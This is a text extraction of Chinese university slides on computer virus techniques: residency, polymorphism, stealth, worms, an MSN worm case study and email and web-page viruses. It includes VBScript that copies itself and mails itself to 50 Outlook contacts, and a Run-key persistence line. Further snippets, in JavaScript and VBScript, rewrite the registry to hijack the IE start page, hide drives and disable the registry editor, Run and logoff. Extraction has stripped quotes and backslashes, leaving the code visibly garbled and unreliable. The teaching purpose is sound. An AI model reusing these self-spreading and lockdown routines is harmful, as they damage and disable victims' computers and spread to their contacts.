计算机病毒技术特征ppt课件

.,第四章计算机病毒技术特征,.,一、常见计算机病毒的技术特征,驻留内存病毒变种EPO（EntryPointObscuring）技术抗分析技术（加密、反跟踪）隐蔽性病毒技术多态性病毒技术插入型病毒技术超级病毒技术,.,破坏性感染技术病毒自动生产技术网络病毒技术,.,1驻留内存:DOSTSR,DOS病毒驻留内存位置示意图,.,1驻留内存：引导区病毒的内存驻留,大小在1K或者几K为了避免用户可以很容易的觉察到系统可用内存的减少，一些病毒会等待DOS完全启动成功，然后使用DOS自己的功能分配内存。不用考虑重载。,.,1驻留内存：Windows环境下病毒的内存驻留,三种驻留内存的方法由于Windows操作系统本身就是多任务的，所以最简单的内存驻留方法是将病毒作为一个应用程序，病毒拥有自己的窗口（可能是隐藏的）、拥有自己的消息处理函数；另外一种方法是使用DPMI申请一块系统内存，然后将病毒代码放到这块内存中；第三种方法是将病毒作为一个VXD（Win3.x或者Win9x环境下的设备驱动程序）或者在WinNTWin2000下的设备驱动程序WDM加载到内存中运行。,.,防止重载的方法传统的防止重入方法禁止启动两个实例对于VXD病毒静态加载时，病毒会在“SYSTEM.INI”文件中包含加载设备驱动程序的一行信息；动态加载时，可能使用某些英特尔CPU的一些特殊状态位来表示病毒是否存在于内存中（CIH病毒就采用了这种方法）。,.,1驻留内存：宏病毒的内存驻留方法,病毒随着宿主程序而被加载并且一直存在于系统中，所以从某种意义上，宏病毒都是内存驻留病毒。宏病毒通过检测自己的特征防止重入。,.,2病毒变种,变形变种新品种两种方式：手工变种自动变种（MutationEngine：变形机）保加利亚的DarkAvenger的变形机最著名。,.,分类,第一类，具备普通病毒所具有的基本特性，然而，病毒每感染一个目标后，其自身代码与前一被感染目标中的病毒代码几乎没有三个连续的字节是相同的，但这些代码及其相对空间的排列位置是不变动的。这里称其为一维变形病毒。第二类，除了具备一维变形病毒的特性外，并且那些变化的代码相互间的排列距离（相对空间位置）也是变化的，有的感染文件的字节数不定。这里称其为二维变形病毒。第三类，具备二维变形病毒的特性，并且能分裂后分别潜藏在几处，随便某一处的子病毒被激发后都能自我恢复成一个完整的病毒。病毒在附着体上的空间位置是变化的，即潜藏的位置不定。例如，在某台机器中，病毒的一部分可能藏在机器硬盘的主引导区中，另外几部分也可能潜藏在可执行文件中，也可能潜藏在覆盖文件中，也可能潜藏在系统引导区，也可能另开垦一块区域潜藏等等。在另一台被感染的机器内，病毒可能又改变了其潜藏的位置。这里称其为三维变形病毒。第四类，具备三维变形病毒的特性，并且，这些特性随时间动态变化。例如，在染毒的机器中，刚开机时病毒在内存里变化为一个样子，一段时间后又变成了另一个样子，再次开机后病毒在内存里又是一个不同的样子。这里称其为四维变形病毒。,.,3EPO（EntryPointObscuring）技术,为什么要采用EPO技术呢？杀毒技术提高-防止被发现-EPO三种实现方法：最早的EPO通过改变程序入口处的代码实现的。简单但无用把宿主程序的任意位置的指令替换为跳转语句。难点在于定位一个完整的指令（类似于一个反编译器）PATCHIAT的函数。,.,如果在一段代码中有一条指令：228738fdff15eb0f107dcall7d100febh把它替换成新的指令CallAddressofvirus在病毒体内还要再次调用Call7d100febh来完成宿主程序的功能。代码如下：dwff15h;ff15eb0f107d的前缀backaddrdd0;存放ff15eb0f107d的后缀，这个后缀是变化的在病毒代码中，把backaddr的值动态的改为Call7d100febh指令编译后的后缀。,.,4抗分析技术,加密技术：这是一种防止静态分析的技术，使得分析者无法在不执行病毒的情况下，阅读加密过的病毒程序。反跟踪技术：使得分析者无法动态跟踪病毒程序的运行。Win95.Flagger病毒,.,4抗分析技术：自加密技术,数据加密（信息加密）例如：6.4计算机病毒就是这样处理的，计算机病毒发作时将在屏幕上显示的字符串被用异或操作的方式加密存储。1575病毒加密数据文件。加密文件名COMMAND.COM病毒代码加密ChineseBomb把宿主程序前6个字节加密并转移位置。1701/1704用宿主程序的长度作为密钥加密代码。,.,4抗分析技术：反跟踪技术,DOS下，修改int0-3中断Windows下：封锁键盘输入关闭屏幕显示修改堆栈指令程序运行计时动态地生成指令代码,.,5隐蔽性病毒技术,引导型隐藏方法一感染时，修改中断服务程序使用时，截获INT13调用,.,引导型隐藏方法二针对杀毒软件对磁盘直接读写的特点。截获INT21H，然后恢复感染区最后，再进行感染,.,文件型病毒的隐藏技术,拦截（API,INT调用）访问恢复再感染。例如，改变文件大小病毒，dir病毒等,.,宏病毒的隐藏技术,删除相关的菜单项：“文件模板”或者“工具宏”使用宏病毒自己的FileTemplates和ToolsMacro宏替代系统缺省的宏,.,6多态性病毒技术,多态病毒就是没有特殊特征码的病毒，这种病毒无法（或极难）用特征码扫描法检测到。方法：使用不固定的密钥或者随机数加密病毒代码运行的过程中改变病毒代码通过一些奇怪的指令序列实现多态性BASIC，Shell等解释性语言可以在一行包括很多语句。,.,使用加密技术的多态性,.,改变可执行代码技术的多态病毒,基本上都使用在宏病毒中，其他病毒少见。宏语言都是以BASIC为基础的。引导型病毒在引导区或者分区表中，包含了一小段代码来加载实际的病毒代码，这段代码在运行的过程中是可以改变的。文件型病毒“厚度”（Ply）病毒“TMC”病毒,.,多态病毒的级别,半多态：病毒拥有一组解密算法，感染的时候从中间随机的选择一种算法进行加密和感染。具有不动点的多态：病毒有一条或者几条语句是不变的（我们把这些不变的语句叫做不动点），其他病毒指令都是可变的。带有填充物的多态：解密代码中包含一些没有实际用途的代码来干扰分析者的视线。算法固定的多态：解密代码所使用的算法是固定的，但是实现这个算法的指令和指令的次序是可变的。算法可变的多态：使用了上述所有的技术，同时解密算法也是可以部分或者全部改变的。完全多态：算法多态，同时病毒体可以随机的分布在感染文件的各个位置，但是在运行的时候能够进行拼装，并且可以正常工作。,.,查杀技术,对于前面3种多态病毒，可以使用病毒特征码或者改进后的病毒特征码对于第4种多态病毒，可以增加多种情况的改进后的特征码至于第5和第6种多态病毒，依靠传统的特征码技术是完全无能为力的。最好的办法是虚拟执行技术。,.,7插入型病毒技术,DOS下较少PE病毒大多数都是插入型病毒例如，CIH,.,8超级病毒技术,超级病毒技术就是在计算机病毒进行感染、破坏时，使得病毒预防工具无法获得运行机会的病毒技术。技术较难实现。和杀毒技术相比，具有时效性。,.,9破坏性感染技术,破坏性感染病毒是针对计算机病毒消除技术的一项病毒技术。实例：Burge病毒是这类病毒的典型代表，该病毒会使宿主文件头部丢失560字节；Hahaha病毒会使宿主程序丢失13592字节。传播性差-破坏面小在潜伏期长的情况下，其传播性可以有所改观。,.,10病毒自动生产技术,针对病毒分析的技术两种类型：根据简单的操作，自动生成病毒（PE,宏病毒等）用自动生成技术实现变种（MutationEngine）,.,11网络病毒技术,网络病毒是指以网络为平台，对计算机产生安全威胁的所有程序的总和.常见的几种：木马病毒（Trojan）蠕虫病毒（Worm）邮件病毒网页病毒,.,二、流行病毒的关键技术,蠕虫病毒利用Outlook漏洞编写病毒Webpage中的恶意代码流氓软件,.,1蠕虫病毒,蠕虫这个名词的由来是在1982年，Shock和Hupp根据TheShockwaveRider一书中的概念提出了一种“蠕虫（Worm）”程序的思想。蠕虫（Worm）是病毒的一种，它的传播通常不需要所谓的激活。它通过分布式网络来散播特定的信息或错误，进而造成网络服务遭到拒绝并发生死锁。具有病毒共性：如传播性、隐蔽性、破坏性等独有的性质：不利用文件寄生，对网络造成拒绝服务，以及和黑客技术相结合等等,.,两类：一种是面向企业用户和局域网而言，这种病毒利用系统漏洞，主动进行攻击，可以对整个互联网可造成瘫痪性的后果。以“红色代码”、“尼姆达”以及最新的“SQL蠕虫王”为代表。另外一种是针对个人用户的，通过网络（主要是电子邮件、恶意网页形式）迅速传播的蠕虫病毒，以爱虫病毒、求职信病毒为代表。和普通病毒的区别：,.,蠕虫病毒的特性,第一，利用漏洞主动进行攻击第二，病毒制作技术新第三，与黑客技术相结合，潜在的威胁和损失更大第四，传染方式多第五，传播速度快第六，清除难度大第七，破坏性强,.,蠕虫病毒的机理,蠕虫病毒由两部分组成：一个主程序和另一个是引导程序。主程序收集与当前机器联网的其他机器的信息。利用漏洞在远程机上建立引导程序。引导程序把“蠕虫”病毒带入了它所感染的每一台机器中。当前流行的病毒主要采用一些已公开漏洞、脚本、电子邮件等机制进行传播。例如，IRC,RPC等漏洞。,.,蠕虫病毒实例,MSN蠕虫病毒1.基本特征：名称：IM-Worm.Win32.Webcam.a原始大小：188,928字节压缩形式：PESpin编写语言：MicrosoftVisualBasic6.0文件名称：LMAO.pif，LOL.scr，naked_drunk.pif等。,.,2.行为分析：（1）蠕虫运行后，将释放一个名为CZ.EXE文件到C盘根目录，并将它拷贝到%system%目录下，文件名为winhost.exe。然后，将文件属性设置为隐藏、只读、系统，同时将该文件创建时间改成同系统文件日期一样，进行欺骗迷惑。同时蠕虫会在C盘跟目录随机生成一个文件，扩展名为PIF或EXE等，该文件用来向MSN好友传播。此外，病毒还会在%system%目录下生成msnus.exe，该文件为蠕虫自身拷贝。,.,（2）将自身加入到注册表启动项目保证自身在系统重启动后被加载：位置：SoftwareMicrosoftWindowsCurrentVersionRun键名：win32键值：winhost.exe位置：SoftwareMicrosoftWindowsCurrentVersionRunServices键名：win32键值：winhost.exe,.,（3）蠕虫病毒会在C盘根目录生成一个图片文件，名字为sexy.jpg，并调用jpg关联程序打开该图片。一般情况下，会用IE打开该图片，打开后效果如下图。（4）开启本地TCP10 xx端口，频繁连接目标：28:8080，接受黑客控制。（5）查找MSN窗口，如果存在，则向好友列表中发送消息传播自身。,.,3.防范方案：（1）手工清除。按照上面的行为分析，终止并删除相关进程文件，修复注册表。（2）用户可以避免接收MSN上发来的陌生附件，包括扩展名为EXE或SCR等的附件，来预防该蠕虫。,.,如何防范蠕虫,预防第一工具保护定期扫描你的系统更新你的防病毒软件不要轻易执行附件中的EXE和COM等可执行程序不要轻易打开附件中的文档文件,.,不要直接运行附件邮件程序设置谨用预览功能卸载ScriptingHost警惕发送出去的邮件,.,2利用Outlook漏洞编写病毒,电子邮件成为新型病毒的重要载体利用Outlook漏洞传播的病毒：“爱虫（ILoveYou）”“美丽杀（Melissa）”-宏病毒“库尔尼科娃”“主页(HomePage)”“欢乐时光（HappyTime）”,.,邮件病毒分类,附件方式：病毒的主要部分就隐藏在附件中。“主页(HomePage)”和“爱虫（ILoveYou）”病毒，它们的附件是VBS文件，也就是病毒关键部分。邮件本身：病毒并不置身于附件，而是藏身于邮件体之中。“欢乐时光（HappyTime）”病毒就是藏身于邮件体中，一旦用户将鼠标移至带毒邮件上，还未阅读邮件就已经中毒了。嵌入方式：病毒仅仅把电子邮件作为其传播手段。“美丽杀（Melissa）”是一种隐蔽性、传播性极大的Word97/2K宏病毒。尽管其核心内容是宏病毒，但在病毒体内有一块代码专门用来传播。当条件符合时，打开用户的电子邮件地址，向前50个地址发送被感染的邮件。,.,电子邮件型病毒的传播原理,自我复制Setfso=CreateObject(Scripting.FileSystemObject)fso.GetFile(WScript.ScriptFullName).Copy(C:temp.vbs)这么两行代码就可以将自身复制到c盘根目录下temp.vbs这个文件。,.,传播电子邮件病毒是通过电子邮件传播的。Setola=CreateObject(Outlook.Application)OnErrorResumeNextForx=1To50SetMail=ola.CreateItem(0)Mail.to=ola.GetNameSpace(MAPI).AddressLists(1).AddressEntries(x)Mail.Subject=BetreffderE-MailMail.Body=TextderE-MailMail.Attachments.Add(C:temp.vbs)Mail.SendNextola.Quit,.,调整脚本语言的超时设置。dimwscr,rrsetwscr=CreateObject(WScript.Shell)rr=wscr.RegRead(HKEY_CURRENT_USERSoftwareMicrosoftWindowsScriptingHostSettingsTimeout)if(rr=1)thenwscr.RegWriteHKEY_CURRENT_USERSoftwareMicrosoftWindowsScriptingHostSettingsTimeout,0,REG_DWORDendif,.,修改注册表，使得每次系统启动时自动执行脚本regcreateHKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32,dirsystem/该函数是现在收藏夹里增加一个站点functionAddFavLnk(loc,DispName,SiteURL)varShor=Shl.CreateShortcut(loc+DispName+.URL);Shor.TargetPath=SiteURL;Shor.Save();/该函数是病毒的主函数，实现COOKIES检查、注册表修改等functionf()try,.,/声明一个ActiveX对象ActiveXinitializationa1=document.applets0;a1.setCLSID(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B);/创建几个实例a1.createInstance();Shl=a1.GetObject();a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228);a1.createInstance();FSO=a1.GetObject();a1.setCLSID(F935DC26-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Net=a1.GetObject();tryif(documents.cookies.indexOf(Chg)=-1)/设置IE起始页Shl.RegWrite(HKCUSoftwareMicrosoftInternetExplorerMainStartPage,varexpdate=newDate(newDate().getTime()+(1);documents.cookies=Chg=general;expires=+expdate.toGMTString()+;path=/;,.,/消除RUN按钮Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun,01,REG_BINARY);/消除关闭按钮Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose,01,REG_BINARY);/消除注销按钮Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff,01,REG_BINARY);/隐藏盘符Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives,63000000,REG_DWORD);/禁止注册表Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools,00000001,REG_DWORD);/禁止运行DOS程序Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled,00000001,REG_DWORD);,.,/禁止进入DOS模式Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode,00000001,REG_DWORD);/开机提示窗口标题Shl.RegWrite(HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption,你已经中毒);/开机提示窗口信息Shl.RegWrite(HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText,你已经中毒);/设置IE标题Shl.RegWrite(HKLMSoftwareMicrosoftInternetExplorerMainWindowTitle,你已经中毒);Shl.RegWrite(HKCUSoftwareMicrosoftInternetExplorerMainWindowTitle,你已经中毒);catch(e)catch(e)/初始化函数functioninit()setTimeout(f(),1000);/开始执行init();,.,网络炸弹,/首先声明插入脚本为JavaScript/定义不断打开新窗口的函数openwindows()，所带参数表明打开窗口数量functionopenwindows(number)/循环for(i=0;i/脚本结束标志,.,类“万花筒病毒”,声明脚本为VBScript定义函数runVirus()FunctionrunVirus()实验中弹出对话框告知学员病毒进程msgbox(将要修改主页了！)执行注册表改写1，把IE主键修改成YourHomePageRwHKEY_CURRENT_USERSoftwareMicrosoftInternetExplorerMainStartPage,YourHomePage,REG_SZmsgbox(修改主页完成，查看一下吧！)msgbox(将要隐藏A盘盘符！)执行注册表改写2：隐藏A盘盘符,.,RwHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives,00000001,REG_DWORDmsgbox(A盘盘符消失！)msgbox(注册表工具将要被禁用！)执行注册表改写3：禁用注册表编辑器RwHKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools,00000001,REG_DWORDmsgbox(注册表工具禁用！)EndFunction,.,注册表写函数SubRw(k,v,t)DimROnErrorResumeNext关键步骤，调用WScript.Shell对象来获得修改权利SetR=CreateObject(WScript.Shell)调用WScript.Shell的方法来写注册表R.RegWritek,v,tEndSub,.,注册表读函数FunctionRg(v)DimROnErrorResumeNext关键步骤，调用WScript.Shell对象来获得读取权利SetR=CreateObject(WScript.Shell)调用WScript.Shell的方法来读注册表Rg=R.RegRead(v)EndFunction插入脚本结束,.,流氓软件,流氓软件定义第一个定义：流氓软件是指具有一定的实用价值但具备电脑病毒和黑客的部分行为特征的软件。它处在合法软件和电脑病毒之间的灰色地带，他会使你无法卸